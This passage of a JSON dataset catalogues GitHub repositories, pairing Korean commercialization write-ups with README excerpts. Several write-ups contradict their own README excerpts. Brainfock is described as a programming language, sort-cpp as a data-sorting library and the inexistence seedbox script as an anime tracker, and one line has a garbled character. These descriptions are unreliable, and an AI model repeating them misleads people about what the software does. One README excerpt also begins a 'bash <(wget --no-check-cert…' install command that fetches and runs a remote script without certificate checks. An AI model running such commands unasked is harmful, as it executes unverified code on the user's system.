[tutorial](http://pycassa.github.com/pycassa/tutorial.html),\n[API documentation](http://pycassa.github.com/pyca","composite_score":0.5155,"license_safety_tag":"unknown"},{"name":"lixuancn/MeepoPS","github_url":"https://github.com/lixuancn/MeepoPS","stars":499,"language":"PHP","license":"WTFPL","abandonment_months":66,"description":"# MeepoPS 상용화 분석\n\n## 왜 보물인가\n온라인 게임의 핵심 기능인 '서버 관리 시스템'을 누구나 사용할 수 있게 만든 오픈소스로, 게임 개발사들이 수백만 원 드는 솔루션을 무료로 대체할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 소규모 게임 개발사를 위한 \"게임 서버 관리 클라우드 플랫폼\" - 복잡한 기술 없이","readme_excerpt":"# MeepoPS\n###### MeepoPS是Meepo PHP Socket的缩写. 旨在提供高效稳定的由纯PHP开发的多进程SocketService.\n###### MeepoPS可以轻松构建在线实时聊天, 即时游戏, 视频流媒体播放, RPC, 实时监控, 以及原本使用HTTP的接口/定时任务的场景中等.\n\n#### 综述:\n- 目前版本为V1.0.0 ( [查看改动日志](http://meepops.lanecn.com/doc/main/1-summary/7-update-log.html) ).\n- PHP作为最好的语言, 不仅仅能依靠Nginx来开发Web应用, 同时,也可以构建高效稳定的即时通讯类Socket应用.\n- MeepoPS的最低运行要求是安装了PHP的PCNTL库.\n- MeepoPS的定位是一个插件. 不但可以独立运行, 也可以依附与ThinkPHP, CodeIgniter, YII等MVC框架中.\n\n#### 传送门:\n- 手册地址: http://meepops.lanecn.com\n- Github: https://github.com/lixuancn/MeepoPS\n- Bug提交: https://github.com/lixuancn/MeepoPS/issues\n- 微博: http://weibo.com/lanephp\n\n#### 声明:\n- 绝大多数的PHP应用都部署在Linux服务器, 因此MeepoPS不支持非Unix操作系统(例如Windows). 你可以使用Apple Mac(OS X), CentOS, Ubuntu, Red Hat, Fedora, FreeBSD等类Unix操作系统来启动MeepoPS.\n- Windows用户可以安装VirtualBox, Vmware等虚拟机软件来运行MeepoPS.\n- MeepoPS需要PHP的POSIX库. POSIX是PHP默认安装的, 通常情况下你不需要手动安装. 如何安装: [PHP手册-POSIX安装](http://php.net/manual/zh/posix.installation.php)\n- 多进程及信号处理需要依赖PHP的PCNTL库. MeepoPS深度依赖PCNTL, 因此PCNTL库是必须安装的, 即使只启动一个进程","composite_score":0.5155,"license_safety_tag":"safe"},{"name":"tyrchen/geektime-rust","github_url":"https://github.com/tyrchen/geektime-rust","stars":9,"language":"Rust","license":"Apache-2.0","abandonment_months":39,"description":"# tyrchen/geektime-rust 상용화 분석\n\n## 왜 보물인가\n프로그래밍 초보자도 배울 수 있도록 정리된 Rust 학습 자료로, 점점 더 많은 기업이 필요로 하는 안전하고 빠른 프로그래밍 언어를 쉽게 배우게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 플랫폼 (SaaS)**\n유료 온라인 코딩 강좌로 패키징하여 구독 고객을 모집하","readme_excerpt":"# geektime-rust\n\n我的极客时间 [Rust 第一课](https://time.geekbang.org/column/intro/100085301) 的代码仓库，随课程更新\n\n![rust 第一课](images/rust_qr.jpg)\n","composite_score":0.5154,"license_safety_tag":"safe"},{"name":"linmomo/Android_open_project","github_url":"https://github.com/linmomo/Android_open_project","stars":498,"language":"","license":"unknown","abandonment_months":104,"description":"# Android 오픈 프로젝트 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발에 필요한 다양한 완성된 코드들을 모아놓은 자료실로, 앱 개발자들이 처음부터 다시 만들 필요 없이 검증된 솔루션을 빠르게 가져다 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발사의 내부 업무 도구**: 개발팀이 프로젝트마다 반복되는 기능들을 이 저장소에서 찾아 ","readme_excerpt":"# Android开源项目\nAndroid开源项目，旨在搜集平常工作中遇到和可能需要用到的一些好的开源项目。\n\n## **系统控件**\n\n* TextView\n    * [一个功能强大的TextView，可以满足日常大部分布局方式](https://github.com/lygttpod/SuperTextView)\n    * [Facebook 开源文本布局库](https://github.com/facebookincubator/TextLayoutBuilder)\n    * [一个对齐TextView文本的库](https://github.com/bluejamesbond/TextJustify-Android)\n    * [自适应大小和行的TextView](https://github.com/AndroidDeveloperLB/AutoFitTextView)\n    * [一个方便你在App里使用自定义字体的库](https://github.com/vsvankhede/easyfonts)\n    * [更方便的调整 Android 中的字体，这个库自带了一些第三方英文字体](https://github.com/Ishmeetsingh97/FontometricsLibrary)\n    * [LyricView：歌词Textview](https://github.com/markzhai/LyricView)\n    * [歌词显示控件，支持多行显示、拖曳播放、自动识别歌词文件的编码](https://github.com/zhengken/LyricViewDemo)\n    * [歌词风格的 TextView，利用 Gradient 渐变实现](https://github.com/livesun/GradientTextView)\n    * [高级TextView,支持自适应,阅读更多多种高级功能](https://github.com/oktayayr/advancedtextview)\n    * [精美文本下划线](https://github.com/romainguy/elegant-underline)\n    * [非常实用的省略控件，无emoji截断之乱码， 无characterstyle截断之不雅","composite_score":0.5154,"license_safety_tag":"unknown"},{"name":"Renovamen/playground-macos","github_url":"https://github.com/Renovamen/playground-macos","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":25,"description":"# Renovamen/playground-macos 분석\n\n## 왜 보물인가\nMac 컴퓨터 사용자들이 새로운 프로그램을 쉽게 만들고 테스트할 수 있는 개발 연습장으로, 프로그래밍을 배우려는 입문자들의 학습 자료로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **Mac 개발자 교육 플랫폼**: 초보 프로그래머들이 웹 강좌와 함께 실제 코드를 직접 작성하","readme_excerpt":"# playground-macos\n\nMy portfolio website simulating macOS's GUI: https://portfolio.zxh.me\n\nPowered by [React](https://reactjs.org/) + [Zustand](https://zustand-demo.pmnd.rs/) + [UnoCSS](https://uno.antfu.me/) + [TypeScript](https://www.typescriptlang.org/) + [Vite](https://vitejs.dev/).\n\n![light mode](./public/screenshots/light.png)\n![dark mode](./public/screenshots/dark.png)\n\n\n&nbsp;\n\n## Usage\n\nClone the repo and install dependencies:\n\n```bash\npnpm install\n```\n\nStart dev server (with hot reloading):\n\n```bash\npnpm dev\n```\n\nBuild for production with minification to the `dist` folder:\n\n```bash\npnpm build\n```\n\n\n&nbsp;\n\n## Changelog\n\n- **Update 2023.06.26**: Improve [FaceTime](https://support.apple.com/en-us/HT208176).\n\n- **Update 2023.06.25**: Add [Typora](https://typora.io/), built on top of [Milkdown](https://milkdown.dev/).\n\n- **Update 2021.12.05**: Simulated the device's actual battery state using [Battery API](https://developer.mozilla.org/en-US/docs/Web/API/Battery_Status_API), disp","composite_score":0.5154,"license_safety_tag":"safe"},{"name":"shervinea/mit-15-003-data-science-tools","github_url":"https://github.com/shervinea/mit-15-003-data-science-tools","stars":11,"language":"","license":"MIT","abandonment_months":70,"description":"# MIT 15.003 데이터 과학 도구 저장소 분석\n\n## 왜 보물인가\nMIT 정규 강의를 기반으로 만든 실무 데이터 분석 교재이자 도구 모음으로, 누구나 배우고 활용할 수 있는 검증된 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 데이터 분석 교육 플랫폼으로, 기업 직원들의 데이터 리터러시 향상 교육 제공\n2. **내","readme_excerpt":"# Data Science Tools study guides for MIT's 15.003\n\n## Goal\nThis repository aims at summing up in the same place all the important notions that are covered in MIT's 15.003 Data Science Tools course and includes:\n- **Study guides** for SQL, R, Python, Git and Bash.\n- **Conversion guides** between R and Python.\n- All elements of the above combined in an **ultimate compilation of concepts**, to have with you at all times!\n\n## Content\n#### Study guides\n|<a href=\"https://github.com/shervinea/mit-15-003-data-science-tools/blob/master/en/study-guide-data-retrieval-with-sql.pdf\"><img src=\"https://www.mit.edu/~amidi/teaching/data-science-tools/illustrations/cover/en-001.png\" alt=\"Illustration\" width=\"220px\"/></a>|<a href=\"https://github.com/shervinea/mit-15-003-data-science-tools/blob/master/en/study-guide-data-manipulation-with-r.pdf\"><img src=\"https://www.mit.edu/~amidi/teaching/data-science-tools/illustrations/cover/en-002.png\" alt=\"Illustration\" width=\"220px\"/></a>|<a href=\"https://github.c","composite_score":0.5154,"license_safety_tag":"safe"},{"name":"12dmodel/deep_motion_mag","github_url":"https://github.com/12dmodel/deep_motion_mag","stars":499,"language":"Python","license":"MIT","abandonment_months":93,"description":"# Deep Motion Mag 상용화 분석\n\n## 왜 보물인가\n영상에서 움직임의 미묘한 변화를 감지하고 시각화하는 기술로, 의료·보안·스포츠 분석 등 다양한 분야에서 숨은 정보를 드러낼 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 의료 진단 SaaS 서비스**\n- 환자의 미세한 떨림이나 움직임 이상을 감지하여 신경계 질환 조기 진단을 돕는 웹 기반","readme_excerpt":"# Learning-based Video Motion Magnification\n\nTensorflow implementation of Learning-based Video Motion Magnification. [\\[Project page\\]](https://people.csail.mit.edu/tiam/deepmag/) [\\[Paper\\]](https://arxiv.org/abs/1804.02684) [\\[Data\\]](https://groups.csail.mit.edu/graphics/deep_motion_mag/data/readme.txt)\n\nCollaborators: \n\\*(Tae-Hyun Oh, Ronnachai \"Tiam\" Jaroensri), Changil Kim, Mohamed A. Elgharib, Fr&eacute;do Durand, William T. Freeman, Wojciech Matusik\n\n\\*Equal contribution.\n\n[Video demo]\n\n[![Video demo](https://img.youtube.com/vi/GrMLeEcSNzY/0.jpg)](https://www.youtube.com/watch?v=GrMLeEcSNzY)\n\n# Installation\n\nInstall required packages:\n\n```\nsudo apt-get install python-dev \t# required to install setproctitle\npip install -r requirements.txt\n```\n\nThis code has been tested with Tensorflow 1.3 and 1.8, CUDA 8.5 and 9.1, Ubuntu 14.04 and 16.04, although we expect it to work with any newer versions of Tensorflow and CUDA.\n\n\n# Running\n\nDownload and place the [pre-trained model](https://","composite_score":0.5153,"license_safety_tag":"safe"},{"name":"akveo/eva-icons","github_url":"https://github.com/akveo/eva-icons","stars":25,"language":"TypeScript","license":"MIT","abandonment_months":39,"description":"# Eva Icons 상용화 분석\n\n## 왜 보물인가\n웹사이트와 앱을 만들 때 필요한 깔끔한 아이콘 디자인을 누구나 자유롭게 쓸 수 있어서, 디자인 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리 앱, 협업 도구 등에서 기본 아이콘을 제공하여 사용자 경험 향상\n2. **내부 업무 도구**: 회사 직원","readme_excerpt":"<h1><img src=\"https://i.imgur.com/cXYo5bi.png\"> Eva Icons</h1>\n<img src=\"https://i.imgur.com/oDmqDkE.jpg\">\n\n**Eva Icons** is a pack of more than 480 beautifully crafted Open Source icons for common actions and items. Additionally, Eva Icons supports 4 animation types: `zoom`, `pulse`, `shake` and `flip`.  Download on desktop to use them in your digital products for Web, iOS and Android. Icons are provided in two visual types: `Fill` and `Outline` and in several formats, including `PNG`, `SVG`, `font`, `Sketch`, etc.\n\n## Download\n- [Complete Eva Icons Package](https://akveo.github.io/eva-icons/eva-icons.zip)\n- [NPM Package](https://www.npmjs.com/package/eva-icons)\n- you also can download icons one by one in `PNG` and `SVG` formats from [Eva Icons Website](https://akveo.github.io/eva-icons/?utm_campaign=eva_icons%20-%20home%20-%20eva_icons%20github%20readme&utm_source=eva_icons&utm_medium=referral&utm_content=github_readme_download_eva_icons).\n\n### CDN\n\nLoad from CDN in your project:\n```","composite_score":0.5153,"license_safety_tag":"safe"},{"name":"kaorun343/vue-property-decorator","github_url":"https://github.com/kaorun343/vue-property-decorator","stars":5,"language":"TypeScript","license":"mit","abandonment_months":38,"description":"# vue-property-decorator 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 더 쉽고 빠르게 코드를 작성할 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 협업 도구나 프로젝트 관리 플랫폼 같은 웹 기반 소프트웨어의 개발 속도를 2-3배 가속화\n2. **내부 업무 도구**: 기업의 인사","readme_excerpt":"\n# [DEPRECATED] Vue Property Decorator\n## ⚠️ Notice\nThis library is no longer actively maintained. If you still want to use classes, check out the community-maintained project [`vue-facing-decorator`](https://facing-dev.github.io/vue-facing-decorator/#/).\n\n---\n\n[![npm](https://img.shields.io/npm/v/vue-property-decorator.svg)](https://www.npmjs.com/package/vue-property-decorator)\n[![Build Status](https://travis-ci.org/kaorun343/vue-property-decorator.svg?branch=master)](https://travis-ci.org/kaorun343/vue-property-decorator)\n\nThis library fully depends on [vue-class-component](https://github.com/vuejs/vue-class-component), so please read its README before using this library.\n\n## License\n\nMIT License\n\n## Install\n\n```bash\nnpm i -S vue-property-decorator\n```\n\n## Usage\n\nThere are several decorators and 1 function (Mixin):\n\n- [`@Prop`](#Prop)\n- [`@PropSync`](#PropSync)\n- [`@Model`](#Model)\n- [`@ModelSync`](#ModelSync)\n- [`@Watch`](#Watch)\n- [`@Provide`](#Provide)\n- [`@Inject`](#Provide)\n- [`","composite_score":0.5152,"license_safety_tag":"safe"},{"name":"mcximing/sort-cpp","github_url":"https://github.com/mcximing/sort-cpp","stars":500,"language":"C++","license":"GPL-3.0","abandonment_months":54,"description":"# mcximing/sort-cpp 상품화 분석\n\n## 왜 보물인가\n데이터를 빠르게 정렬하는 핵심 알고리즘을 구현한 코드 라이브러리로, 500개의 별을 받은 인기 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **대용량 데이터 처리 SaaS**: 엑셀/CSV 파일을 빠르게 정렬해주는 웹 서비스로 운영 가능\n2. **금융사 내부 도구**: 주식 시세, 거","readme_excerpt":"\n### Introduction\n\nThis is a C++ implementation of SORT, a simple online and realtime tracking algorithm for 2D multiple object tracking in video sequences.\nOriginal Python code and publication infomation found at https://github.com/abewley/sort , By Alex Bewley\n\nThis code has been tested on Windows with Visual Studio Community 2013 + OpenCV 2.4.8. It depends on OpenCV without any other libs, so theoretically it can be compiled on Linux with OpenCV support.\n\nDetection data in The ./data folder come from the original directory of SORT. They are the *Faster* RCNN detections for the MOT benchmark sequences in the benchmark format, created by Alex Bewley.\n\nThe Hungarian algorithm implementation comes from https://github.com/mcximing/hungarian-algorithm-cpp, which is derived from [Markus Buehren's code](http://www.mathworks.com/matlabcentral/fileexchange/6543-functions-for-the-rectangular-assignment-problem).\n\nThe license is also kept to the GPLv3 License.\n\n### Results\n\nThe overall results ","composite_score":0.5152,"license_safety_tag":"restricted"},{"name":"asido/SystemMonitor","github_url":"https://github.com/asido/SystemMonitor","stars":498,"language":"Objective-C","license":"MPL-2.0","abandonment_months":126,"description":"# SystemMonitor 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 건강 상태를 실시간으로 진단해주는 도구로, 기업의 서버 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 �used 수 있나\n\n1. **SaaS 서비스**: 중소 기업 대상 월간 구독형 서버 모니터링 플랫폼 (경쟁사: Datadog, New Relic)\n2. **내부 업무 도구**: I","readme_excerpt":"System Monitor\n=============\n\n![Activity Monitor on iPad 4](http://i.imgur.com/iTgUksW.png)\n\niOS application providing you all information about your device - hardware, operating system, processor, memory, GPU, network interface, storage and battery, including OpenGL powered visual representation in real time. \n\nHardware information: \n- iDevice name \n- Screen resolution \n- Screen size \n- Retina capability \n- Pixel density \n- Aspect ratio \n\nOperating System: \n- Version \n- Build \n- Revision \n- Kernel information \n- Safe Boot \n- Boot time \n- Uptime \n- Tick frequency \n- Operating system limits: processes, files, VNodes \n\nCPU: \n- Name \n- Architecture \n- Physical and logical core count \n- Frequency \n- L1, L2 cache size \n- Endianess \n\nProcesses: \n- List all system processes/daemon and AppStore applications. \n- PID, start time, priority, command path \n\nRAM: \n- Total memory \n- Memory type \n- Memory usage: wired, active, inactive, free \n- Page-ins \n- Page-outs \n- Page-faults \n\nGPU: \n- Chip name\n","composite_score":0.5152,"license_safety_tag":"unknown"},{"name":"Brainfock/Brainfock","github_url":"https://github.com/Brainfock/Brainfock","stars":500,"language":"JavaScript","license":"NOASSERTION","abandonment_months":56,"description":"# Brainfock 저장소 분석\n\n## 왜 보물인가\n매우 단순한 규칙으로 복잡한 프로그램을 만들 수 있는 '미니멀한 프로그래밍 언어'로, 컴퓨터 과학의 이론적 아름다움을 실제로 체험할 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 초중고 컴퓨터 과학 입문 과정 제공 플랫폼\n2. **개발자 커뮤니티 도구**: 프로그래밍","readme_excerpt":"![Brainfock](https://brainfock.files.wordpress.com/2014/11/logo_greenhex_trans.png?w=250 \"Brainfock Logo\")\n\n## Brainfock - Project and Team Management Solution\n\n[![Gitter chat https://gitter.im/Brainfock/Brainfock](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Brainfock/Brainfock?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![CircleCI](https://img.shields.io/circleci/project/Brainfock/Brainfock.svg?maxAge=7200)](https://circleci.com/gh/Brainfock/Brainfock)\n\n## Donate Bitcoin \n\n> 1Ceg8xdYpFmyPgeqqWDBBXVztcuNsWTMpq\n\n### Fucking PayPal does not allow to get donations, because it's great to live in Ukraine. Fuck PayPal!\n\nWritten in universal JavaScript, NodeJS server with Loopback, ReactJS client with everything.\n\nCopyright (C) 2015-present Sergii Gamaiunov [@SergiiGama](https://twitter.com/SergiiGama)\n\n### Please, consider a donation to support this project. I've worked many months to build it 💪\n\n> Brainfock is a modern web-based CMF started o","composite_score":0.5152,"license_safety_tag":"unknown"},{"name":"careercup/CtCI-6th-Edition-JavaScript","github_url":"https://github.com/careercup/CtCI-6th-Edition-JavaScript","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":23,"description":"# careercup/CtCI-6th-Edition-JavaScript 분석\n\n## 왜 보물인가\n유명한 취업 면접 준비 교재를 실제로 실습할 수 있도록 만든 자료라서, 개발자 취업을 준비하는 사람들의 학습 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 프로그래밍 입문자부터 취업 준비생까지 단계별 학습 콘텐","readme_excerpt":"# Cracking the Coding Interview 6th Edition - JavaScript\n\n## Instructions\n\n- This repository contains JavaScript attempts on questions listed in the book.\n\n- So far, code or short writeups are available for the first 10 chapters.\n\n- At Gayle's request, the files only contain code, and do not contain the actual questions. For the questions, please support Gayle by purchasing the [book](https://www.amazon.com/Cracking-Coding-Interview-Programming-Questions/dp/0984782850).\n\n- Under each JavaScript file, there are tests to check that the code is working as expected. For convenience, simple logging is used to test the functions. To run the tests, just cd into the folder containing the .js file and run `node <fileName>.js` to run the tests.\n\n- Contributions welcome\n\n## List of Coding Questions:\n\n#### Chapter 1 \n- [x] 1.1 - Is Unique\n- [x] 1.2 - Check Permutation\n- [x] 1.3 - URLify\n- [x] 1.4 - Palindrome Permutation\n- [x] 1.5 - One Away\n- [x] 1.6 - String Compression\n- [x] 1.7 - Rotate Matrix","composite_score":0.5152,"license_safety_tag":"unknown"},{"name":"Aniverse/inexistence","github_url":"https://github.com/Aniverse/inexistence","stars":7,"language":"Shell","license":"unknown","abandonment_months":50,"description":"# Aniverse/inexistence 분석\n\n## 왜 보물인가\n7개의 별과 2022년 이후 업데이트 중단으로 보아, 특정 니치 분야의 완성도 높은 도구이지만 현재 활발한 개발이나 명확한 상용화 전략이 부재한 상태입니다.\n\n## 어디에 쓸 수 있나\n1. **애니메이션 스트리밍 플랫폼**: 사용자들이 시청한 애니메이션을 자동으로 추적하고 추천해주는 구독 서","readme_excerpt":"# Inexistence\n\n> This is a seedbox script focus on Chinese users, I would prefer [QuickBox Lite](https://github.com/amefs/quickbox-lite), [swizzin](https://swizzin.ltd) for non-Chinese users.  \n> Just a SEEDBOX script, no Plex, no Emby, no NZB support.  \n> And note that this README is outdated, I'm too lazy to keep it update.  \n\n## 2021.07.30 说明\n\n目前本人基本上不再维护这个脚本（偶尔会修复一些严重影响使用的 bug），推荐使用更为优秀的脚本作为代替，如：  \n- **[QuickBox-Lite](https://cn.wiki.ptbox.dev/getting-started/)**  \n- **[swizzin](https://swizzin.ltd/)**  \n\n## Notes\n\n1. 本脚本只支持 x86_64 (amd64) 架构，其他架构都不支持。ARM 用户建议使用 [QuickBox ARM](https://github.com/amefs/quickbox-arm)  \n2. 本脚本只在独服和 KVM 虚拟化的 VPS 下测试，OpenVZ、Xen 等其他虚拟化架构仍可以尝试使用，但不保证没问题  \n3. 本脚本目前支持 Debian 9/10, Ubuntu 16.04/18.04. *推荐使用 Debian 10 或 Ubuntu 18.04*  \n4. 本文的使用说明中的图片是一两年前的，与当前脚本存在较大出入（但文字内容是及时更新的）  \n5. 建议重装完系统后使用此脚本，非全新安装的情况下（比如你先跑了个其他盒子脚本再跑这个）不确定因素太多容易翻车  \n6. 目前没有简单易用的卸载方法。如果你有卸载的需求，使用前请三思  \n\n## Usage\n\n如果你是新手，对很多选项不甚了解，直接用这个就完事了（账号密码部分替换一下）：  \n```\nbash <(wget --no-check-cert","composite_score":0.5151,"license_safety_tag":"unknown"},{"name":"swar/Swar-Chia-Plot-Manager","github_url":"https://github.com/swar/Swar-Chia-Plot-Manager","stars":14,"language":"Python","license":"GPL-3.0","abandonment_months":28,"description":"# Swar-Chia-Plot-Manager 분석\n\n## 왜 보물인가\n암호화폐 채굴 농장을 자동으로 관리하고 모니터링할 수 있는 도구로, 채굴 사업을 하는 사람들의 운영 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 채굴 농장 운영자를 대상으로 월 구독형 대시보드 제공 (수십 개 농장 한눈에 관리)\n2. **내부 ","readme_excerpt":"# Swar's Chia Plot Manager \n\n#### A plot manager for Chia plotting: https://www.chia.net/\n[English](README.md) / [Русский](README.RU.md)\n\n![The view of the manager](https://i.imgur.com/hIhjXt0.png \"View\")\n\n##### Development Version: v0.1.1\n\nThis is a cross-platform Chia Plot Manager that will work on the major operating systems. This is not a plotter. The purpose of this library is to manage your plotting and kick off new plots with the settings that you configure. Everyone's system is unique so customization is an important feature that was engraved into this library.\n\nThis library is simple, easy-to-use, and reliable to keep the plots generating.\n\nThis library has been tested for Windows and Linux.\n\n\n## Features\n\n* Stagger your plots so that your computer resources can avoid high peaks.\n* Allow for a list of destination directories.\n* Utilize temporary space to its maximum potential by starting a new plot early.\n* Run a maximum number of plots concurrently to avoid bottlenecks or lim","composite_score":0.515,"license_safety_tag":"restricted"},{"name":"mavris/MMLanScan","github_url":"https://github.com/mavris/MMLanScan","stars":498,"language":"Objective-C","license":"MIT","abandonment_months":62,"description":"# MMLanScan 상용화 분석\n\n## 왜 보물인가\n같은 네트워크에 연결된 모든 기기를 자동으로 찾아주는 도구로, 회사나 가정에서 불법 접근자나 낯선 기기를 쉽게 감지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 IT 보안 모니터링 플랫폼 (월 구독으로 네트워크 실시간 감시 제공)\n2. **내부 업무 도구**: 기업 ","readme_excerpt":"\nMMLanScan\n======\n\nMMLanScan is an open source project for iOS that helps you scan your network and shows the available devices and their MAC Address, hostname and Brand name.\n\n\n### Important for iOS 11\niOS 11 is breaking the MAC address retrieval from ARP table so MAC Addresses and Brands won't work on MMLanScan with iOS 11.\nWe still using MacFinder since it's helpful in order to discover online devices that won't reply to pings.\n\n### Note\nYou can find a NativeScript wrapper of MMLanScan [here!](https://www.npmjs.com/package/nativescript-lan-scan)\n\n### Screenshot\n![image](LanScan.gif)\n\n### Features\n+ Scans and finds available hosts in your network\n+ Shows IP Address\n+ Shows MAC Address (iOS 10 and below)\n+ Shows Brand of device based on MAC Address (iOS 10 and below)\n+ Shows hostname (if available)\n+ Scan any subnet (not only /24)\n+ Gives you the ability to update the OUI (MAC-Brand mappings) plist file. Check in MainPresenter.m for more details\n\n### Manual Installation\n- Drag n Drop ","composite_score":0.515,"license_safety_tag":"safe"},{"name":"MatthewPierson/1033-OTA-Downgrader","github_url":"https://github.com/MatthewPierson/1033-OTA-Downgrader","stars":499,"language":"Shell","license":"unknown","abandonment_months":79,"description":"# 1033-OTA-Downgrader 분석\n\n## 왜 보물인가\n구형 스마트폰 사용자들이 최신 업데이트로 인한 성능 저하를 피하고 이전 버전으로 돌아갈 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트폰 초기화·관리 플랫폼에 통합하여 사용자들이 웹에서 간단히 버전 다운그레이드 신청\n2. **내부 업무 도구**: 기","readme_excerpt":"# NO LONGER MAINTAINED, USE [VIEUX](https://github.com/MatthewPierson/Vieux) INSTEAD!\n\n\n# 10.3.3 OTA Downgrade Script\nScript to downgrade any device that has iOS 10.3.3 OTA signed.\n \nPlease read this before doing ANYTHING\n-------------------------------------------\n\nYes, this may not work out of the box for everyone. Please note, if you are experienced with compiling things and using package managers, this will be an easy fix. For everyone else, please post any issues on the issues page and I will try to resolve any issues that are present. Also, please do not change a single thing unless you absolutely know what you're doing. Just let the script do its thing.\n\nOnly supports the iPhone 5s (6,1 and 6,2), iPad Air (iPad4,1 iPad4,2 and iPad4,3) and iPad Mini 2 (iPad4,4 and iPad4,5). No iPad4,6 support ever because it doesn't have 10.3.3 OTA signed as it shipped with 7.1 not 7.0.\n\nHas been tested on macOS Mojave but SHOULD work on Catalina as it now doesn't need to write to / but CATALINA ","composite_score":0.515,"license_safety_tag":"unknown"},{"name":"bytedance/AlphaPlayer","github_url":"https://github.com/bytedance/AlphaPlayer","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":38,"description":"# ByteDance AlphaPlayer 시장성 분석\n\n## 왜 보물인가\n동영상 재생 기술을 바이트댄스(틱톡 모회사)가 직접 만들어서 안정성과 성능이 검증된 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 동영상 스트리밍 플랫폼(유튜브 경쟁사)에서 기본 기술로 탑재하여 사용자 경험 향상\n- **내부 업무 도구**: 기업의 교육","readme_excerpt":"## AlphaPlayer\n\n> Powered by ByteDance Live.\n\nAlphaPlayer是直播中台使用的一个视频动画特效SDK，可以通过制作Alpha通道分离的视频素材，再在客户端上通过OpenGL ES重新实现Alpha通道和RGB通道的混合，从而实现在端上播放带透明通道的视频。\n\n这套方案对设计师而言明显降低了特效的制作成本，对于客户端而言有着更可靠的性能和稳定性，且相比cocos2d引擎有着更低的入门门槛和维护成本，为复杂动画的实现提供了一种全新的方式，新的复杂动画开发将会变得更加简单高效。\n\n### 背景\n\n在直播项目的原有礼物动画实现效果是通过cocos引擎实现的，大部分动画都是通过一系列的旋转平移缩放组合而成，能实现的动画效果较简单且开发成本较高。为了丰富动画的表现形式，降低开发成本，我们引入了AlphaPlayer的动画实现方案。\n\n### 方案对比\n\n目前较常见的动画实现方案有原生动画、帧动画、gif/webp、lottie/SVGA、cocos引擎，对于复杂动画特效的实现做个简单对比\n\n| 方案        | 实现成本                             | 上手成本 | 还原程度           | 接入成本 |\n| ----------- | ------------------------------------ | -------- | ------------------ | -------- |\n| 原生动画    | 复杂动画实现成本高                   | 低       | 中                 | 低       |\n| 帧动画      | 实现成本低，但资源消耗大             | 低       | 中                 | 低       |\n| gif/webp    | 实现成本低，但资源消耗大             | 低       | 只支持8位颜色      | 低       |\n| Lottie/SVGA | 实现成本低，部分复杂特效不支持       | 低       | 部分复杂特效不支持 | 低       |\n| cocos2d引擎 | 实现成本高                   ","composite_score":0.5149,"license_safety_tag":"safe"},{"name":"Ramotion/swift-ui-animation-components-and-libraries","github_url":"https://github.com/Ramotion/swift-ui-animation-components-and-libraries","stars":22,"language":"Swift","license":"MIT","abandonment_months":53,"description":"# Swift UI 애니메이션 컴포넌트 및 라이브러리 분석\n\n## 왜 보물인가\niOS 앱에서 부드럽고 예쁜 화면 전환 효과를 쉽게 만들 수 있는 재사용 가능한 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 금융앱, 건강관리앱 등 프리미엄 UX가 중요한 iOS 애플리케이션의 구독 기능\n2. **내부 업무 도구**: 기업 직원들이 ","readme_excerpt":"<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=swift-ui-libraries\"><img src=\"https://github.com/Ramotion/folding-cell/blob/master/header.png\"></a>\n\n# Swift UI Animation Libraries\n\n<p><h3>A curated list of Swift libraries, iOS UI components and UI <a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=swift-ui-libraries\"><b>app development</b></a> by Ramotion</h3><p>\n<p><h4>Try these UI components and contact us if interested.</h4>\n\n<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=swift-ui-libraries\">\n<img src=\"https://github.com/ramotion/gliding-collection/raw/master/contact_our_team@2x.png\" width=\"187\" height=\"34\" alt=\"app development\"></a></p>\n<br>\n<a href=\"https://github.com/Ramotion/circular-carousel\">\n<img align=\"left\" src=\"https://github.com/Ramotion/circular-carousel/blob/master/Screenshots/ios_circular_carousel.gif\" width=","composite_score":0.5149,"license_safety_tag":"safe"},{"name":"naltatis/jade-syntax-docs","github_url":"https://github.com/naltatis/jade-syntax-docs","stars":500,"language":"HTML","license":"unknown","abandonment_months":122,"description":"# Jade 문법 문서 저장소 분석\n\n## 왜 보물인가\n웹 디자인 초보자도 쉽게 배울 수 있도록 정리된 Jade(템플릿 언어) 학습 자료로, 500개 이상의 별을 받은 인기 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: Jade 문법을 배우는 초급자 대상 구독형 강의 서비스 운영\n2. **개발사 내부 교육 도구**: ","readme_excerpt":"# Jade Template Syntax by 